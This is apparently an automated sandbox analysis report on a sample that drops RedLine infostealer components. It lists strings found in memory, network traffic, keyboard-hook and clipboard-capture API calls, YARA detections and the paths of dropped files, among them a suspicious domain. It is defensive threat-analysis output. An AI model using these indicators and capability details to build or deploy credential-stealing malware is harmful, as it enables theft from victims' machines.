                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8hD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/hD
                        Source: powershell.exe, 0000000D.00000002.2182190776.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: microsofts.exe, 00000003.00000003.2510291200.0000000006930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                        Source: alg.exe, 00000005.00000002.3323105151.0000000000436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zrlssa.biz/;:
                        Source: powershell.exe, 0000000D.00000002.2182190776.0000000004A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: Native_Redline_BTC.exe, 00000004.00000002.2126254452.0000000012F52000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000004.00000002.2126254452.0000000012E79000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000004.00000002.2126254452.0000000012F07000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000000.2122053176.0000000000DE2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://api.ip.sb/ip
                        Source: microsofts.exe, 00000003.00000003.2605509231.0000000004FD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                        Source: microsofts.exe, 00000003.00000003.2606559361.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2606812597.0000000004FD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
                        Source: powershell.exe, 0000000D.00000002.2188440741.0000000005AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000D.00000002.2188440741.0000000005AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000D.00000002.2188440741.0000000005AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 0000000D.00000002.2182190776.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 0000000D.00000002.2199793152.00000000074B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                        Source: powershell.exe, 0000000D.00000002.2188440741.0000000005AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                        Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49704 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\microsofts.exe
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe Window created: window name: CLIPBRDWNDCLASS
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window created: window name: CLIPBRDWNDCLASS
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                        System Summary

                        Source: 2.2.svchost.exe.5800000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 3.0.microsofts.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 00000002.00000002.2120236907.0000000005800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
                        Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\cfd441acea3434e2.bin
                        Source: C:\Windows\System32\wbengine.exe File created: C:\Windows\Logs\WindowsBackup
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00409A40
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00412038
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00427161
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0047E1FA
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_004212BE
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00443390
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00443391
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0041A46B
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0041240C
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00446566
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_004045E0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0041D750
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_004037E0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00427859
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00412818
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0040F890
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0042397B
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00411B63
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0047CBF0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0044EBBC
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00412C38
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0044ED9A
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00423EBF
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_00424F70
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0041AF0D
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0538F630
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04E0D580
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04E0C7F0
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DD7F80
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04E03780
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04E100D9
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DD51EE
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04E139A3
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04E05980
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DD6EAF
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04E1515C
                        Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_04DD7B71
                        Source: C:\Windows\System32\alg.exe Code function: 5_2_006A7C00
                        Source: C:\Windows\System32\alg.exe Code function: 5_2_006CA810
                        Source: C:\Windows\System32\alg.exe Code function: 5_2_006D2D40
                        Source: C:\Windows\System32\alg.exe Code function: 5_2_006A79F0
                        Source: C:\Windows\System32\alg.exe Code function: 5_2_006C92A0
                        Source: C:\Windows\System32\alg.exe Code function: 5_2_006CEEB0
                        Source: C:\Windows\System32\alg.exe Code function: 5_2_006C93B0
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_0159DC74
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_0578EE58
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_05788850
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_05780040
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_05780007
                        Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 6_2_05788840
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 7_2_02A485B7
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 7_2_02A485C8
                        Source: C:\Windows\System32\AppVClient.exe Code function: 11_2_00667C00
                        Source: C:\Windows\System32\AppVClient.exe Code function: 11_2_0068A810
                        Source: C:\Windows\System32\AppVClient.exe Code function: 11_2_00692D40
                        Source: C:\Windows\System32\AppVClient.exe Code function: 11_2_006679F0
                        Source: C:\Windows\System32\AppVClient.exe Code function: 11_2_006892A0
                        Source: C:\Windows\System32\AppVClient.exe Code function: 11_2_0068EEB0
                        Source: C:\Windows\System32\AppVClient.exe Code function: 11_2_006893B0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0495B490
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0495B470
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08953E98
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 17_2_05921B94
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 17_2_0592DAAC
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 17_2_059225B8
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 17_2_059225A8
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 17_2_05922563
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 17_2_0592E608
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 17_2_05924177
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 17_2_05921D20
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 17_2_05921B88
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 17_2_05993360
                        Source: C:\Windows\System32\FXSSVC.exe Code function: 23_2_0071A810
